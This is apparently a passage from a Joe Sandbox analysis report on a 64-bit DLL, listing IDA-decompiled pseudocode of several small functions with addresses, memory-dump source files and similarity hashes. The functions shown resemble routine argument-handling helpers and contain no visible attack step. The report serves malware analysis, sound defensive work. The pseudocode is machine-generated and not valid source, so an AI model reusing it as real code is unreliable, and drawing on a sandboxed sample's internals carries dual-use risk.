                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80018e38;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018e3b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180018d98
                                                                      0x180018da9
                                                                      0x180018dac
                                                                      0x180018dae
                                                                      0x180018db3
                                                                      0x180018dbb
                                                                      0x180018dbe
                                                                      0x180018dcd
                                                                      0x180018dcf
                                                                      0x180018dd5
                                                                      0x180018dd8
                                                                      0x180018ddd
                                                                      0x180018de1
                                                                      0x180018de8
                                                                      0x180018dee
                                                                      0x180018df3
                                                                      0x180018df8
                                                                      0x180018dff
                                                                      0x180018e0f
                                                                      0x180018e11
                                                                      0x180018e1b
                                                                      0x180018e20
                                                                      0x180018e28
                                                                      0x180018e2a
                                                                      0x180018e30
                                                                      0x180018e35
                                                                      0x180018e38
                                                                      0x180018e3e
                                                                      0x180018e40
                                                                      0x180018e44
                                                                      0x180018e4a
                                                                      0x180018e54
                                                                      0x180018e56
                                                                      0x180018e5a
                                                                      0x180018e5d
                                                                      0x180018e64
                                                                      0x180018e68
                                                                      0x180018e6f
                                                                      0x180018e73
                                                                      0x180018e78
                                                                      0x180018e7d
                                                                      0x180018e82
                                                                      0x180018e8f
                                                                      0x180018e9e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction ID: 147b5058934c38e7aa78d78f0b3a704ec9a77eeeff37ad31454389f65311a824
                                                                      • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction Fuzzy Hash: 5231A272604B88C6DBA18F29E0803AD77A0F78CB8CF648129EB4C4B750DF36C696D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180016DF0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80016e1c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80016ee9;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80016e5d;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x80016eeb;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80016edb;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80016e97;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x80016eeb;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800247DC(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80016e8f;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80016e92;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180016df0
                                                                      0x180016df0
                                                                      0x180016e01
                                                                      0x180016e04
                                                                      0x180016e06
                                                                      0x180016e0b
                                                                      0x180016e0f
                                                                      0x180016e14
                                                                      0x180016e17
                                                                      0x180016e26
                                                                      0x180016e28
                                                                      0x180016e2e
                                                                      0x180016e31
                                                                      0x180016e36
                                                                      0x180016e3a
                                                                      0x180016e41
                                                                      0x180016e47
                                                                      0x180016e4c
                                                                      0x180016e51
                                                                      0x180016e58
                                                                      0x180016e68
                                                                      0x180016e6a
                                                                      0x180016e74
                                                                      0x180016e78
                                                                      0x180016e80
                                                                      0x180016e82
                                                                      0x180016e88
                                                                      0x180016e8c
                                                                      0x180016e8f
                                                                      0x180016e95
                                                                      0x180016e97
                                                                      0x180016e9b
                                                                      0x180016eab
                                                                      0x180016ead
                                                                      0x180016eb1
                                                                      0x180016eb4
                                                                      0x180016ebb
                                                                      0x180016ebf
                                                                      0x180016ec6
                                                                      0x180016eca
                                                                      0x180016ecf
                                                                      0x180016ed4
                                                                      0x180016ed9
                                                                      0x180016ee6
                                                                      0x180016ef5

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 085054e42fb680c2cee7f9cbdb044d481e08e68245b2aef5394a32e06da7d157
                                                                      • Instruction ID: ce63b4f6da9559d18d9288d252fb2e50f756646aad2815b93fde4606f2565401
                                                                      • Opcode Fuzzy Hash: 085054e42fb680c2cee7f9cbdb044d481e08e68245b2aef5394a32e06da7d157
                                                                      • Instruction Fuzzy Hash: 4031A476614B98C5DBA28F29D4403AD7BE0E38DB8CF248215EB8D4B761CF36C196CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180018EC8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018ef3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80018fc0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018f34;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018fc2;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80018fb2;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80018f6e;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80018fc2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80018f66;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018f69;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180018ec8
                                                                      0x180018ed9
                                                                      0x180018edc
                                                                      0x180018ede
                                                                      0x180018ee3
                                                                      0x180018eeb
                                                                      0x180018eee
                                                                      0x180018efd
                                                                      0x180018eff
                                                                      0x180018f05
                                                                      0x180018f08
                                                                      0x180018f0d
                                                                      0x180018f11
                                                                      0x180018f18
                                                                      0x180018f1e
                                                                      0x180018f23
                                                                      0x180018f28
                                                                      0x180018f2f
                                                                      0x180018f3f
                                                                      0x180018f41
                                                                      0x180018f4b
                                                                      0x180018f4f
                                                                      0x180018f57
                                                                      0x180018f59
                                                                      0x180018f5f
                                                                      0x180018f63
                                                                      0x180018f66
                                                                      0x180018f6c
                                                                      0x180018f6e
                                                                      0x180018f72
                                                                      0x180018f78
                                                                      0x180018f82
                                                                      0x180018f84
                                                                      0x180018f88
                                                                      0x180018f8b
                                                                      0x180018f92
                                                                      0x180018f96
                                                                      0x180018f9d
                                                                      0x180018fa1
                                                                      0x180018fa6
                                                                      0x180018fab
                                                                      0x180018fb0
                                                                      0x180018fbd
                                                                      0x180018fcc

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction ID: 174302f09a937d38d3b0b1f65f5b8abe25ca992e0e1863510c9ec31c57da10e6
                                                                      • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction Fuzzy Hash: 33317172205B9886DB618F29D0403AD7BA1F79DF88F248129EB8C4B751DF36C296DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180016EF8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80016f24;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80016ff3;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80016f65;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80016ff5;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80016fe5;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80016fa1;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80016ff5;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024A10(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80016f99;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80016f9c;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180016ef8
                                                                      0x180016ef8
                                                                      0x180016f09
                                                                      0x180016f0c
                                                                      0x180016f0e
                                                                      0x180016f13
                                                                      0x180016f17
                                                                      0x180016f1c
                                                                      0x180016f1f
                                                                      0x180016f2e
                                                                      0x180016f30
                                                                      0x180016f36
                                                                      0x180016f39
                                                                      0x180016f3e
                                                                      0x180016f42
                                                                      0x180016f49
                                                                      0x180016f4f
                                                                      0x180016f54
                                                                      0x180016f59
                                                                      0x180016f60
                                                                      0x180016f70
                                                                      0x180016f72
                                                                      0x180016f7c
                                                                      0x180016f81
                                                                      0x180016f89
                                                                      0x180016f8b
                                                                      0x180016f91
                                                                      0x180016f96
                                                                      0x180016f99
                                                                      0x180016f9f
                                                                      0x180016fa1
                                                                      0x180016fa5
                                                                      0x180016fb5
                                                                      0x180016fb7
                                                                      0x180016fbb
                                                                      0x180016fbe
                                                                      0x180016fc5
                                                                      0x180016fc9
                                                                      0x180016fd0
                                                                      0x180016fd4
                                                                      0x180016fd9
                                                                      0x180016fde
                                                                      0x180016fe3
                                                                      0x180016ff0
                                                                      0x180016fff

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d028e7ef5ccf0ba9985552c8e6bf4dd47b16f7576e02f6b364e7992ed74cbaa7
                                                                      • Instruction ID: cac2664e3984db9c768aefd909767c645c44e7d3839c443b0f92373083fe0d49
                                                                      • Opcode Fuzzy Hash: d028e7ef5ccf0ba9985552c8e6bf4dd47b16f7576e02f6b364e7992ed74cbaa7
                                                                      • Instruction Fuzzy Hash: 02319573614A84C5DB628F29E4403AD7BA0F39DB8CF158129EB8C4B761DF36C156CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180018FD0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018ffb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x800190c8;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001903c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800190ca;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800190ba;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80019076;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800190ca;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001906e;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019071;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180018fd0
                                                                      0x180018fe1
                                                                      0x180018fe4
                                                                      0x180018fe6
                                                                      0x180018feb
                                                                      0x180018ff3
                                                                      0x180018ff6
                                                                      0x180019005
                                                                      0x180019007
                                                                      0x18001900d
                                                                      0x180019010
                                                                      0x180019015
                                                                      0x180019019
                                                                      0x180019020
                                                                      0x180019026
                                                                      0x18001902b
                                                                      0x180019030
                                                                      0x180019037
                                                                      0x180019047
                                                                      0x180019049
                                                                      0x180019053
                                                                      0x180019057
                                                                      0x18001905f
                                                                      0x180019061
                                                                      0x180019067
                                                                      0x18001906b
                                                                      0x18001906e
                                                                      0x180019074
                                                                      0x180019076
                                                                      0x18001907a
                                                                      0x180019080
                                                                      0x18001908a
                                                                      0x18001908c
                                                                      0x180019090
                                                                      0x180019093
                                                                      0x18001909a
                                                                      0x18001909e
                                                                      0x1800190a5
                                                                      0x1800190a9
                                                                      0x1800190ae
                                                                      0x1800190b3
                                                                      0x1800190b8
                                                                      0x1800190c5
                                                                      0x1800190d4

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction ID: 644c083b0f242a42578bff8a4423a20a4a11c3da014dd98187306b0fb5cf8bb4
                                                                      • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction Fuzzy Hash: 4D31A272205B88CADB668F69D0503AD7BA0F38DF98F248129EB8D4B751CF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017000(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001702c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800170fb;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001706d;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x800170fd;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800170ed;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x800170a9;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800170fd;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024C14(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x800170a1;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x800170a4;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180017000
                                                                      0x180017000
                                                                      0x180017011
                                                                      0x180017014
                                                                      0x180017016
                                                                      0x18001701b
                                                                      0x18001701f
                                                                      0x180017024
                                                                      0x180017027
                                                                      0x180017036
                                                                      0x180017038
                                                                      0x18001703e
                                                                      0x180017041
                                                                      0x180017046
                                                                      0x18001704a
                                                                      0x180017051
                                                                      0x180017057
                                                                      0x18001705c
                                                                      0x180017061
                                                                      0x180017068
                                                                      0x180017078
                                                                      0x18001707a
                                                                      0x180017084
                                                                      0x180017089
                                                                      0x180017091
                                                                      0x180017093
                                                                      0x180017099
                                                                      0x18001709e
                                                                      0x1800170a1
                                                                      0x1800170a7
                                                                      0x1800170a9
                                                                      0x1800170ad
                                                                      0x1800170bd
                                                                      0x1800170bf
                                                                      0x1800170c3
                                                                      0x1800170c6
                                                                      0x1800170cd
                                                                      0x1800170d1
                                                                      0x1800170d8
                                                                      0x1800170dc
                                                                      0x1800170e1
                                                                      0x1800170e6
                                                                      0x1800170eb
                                                                      0x1800170f8
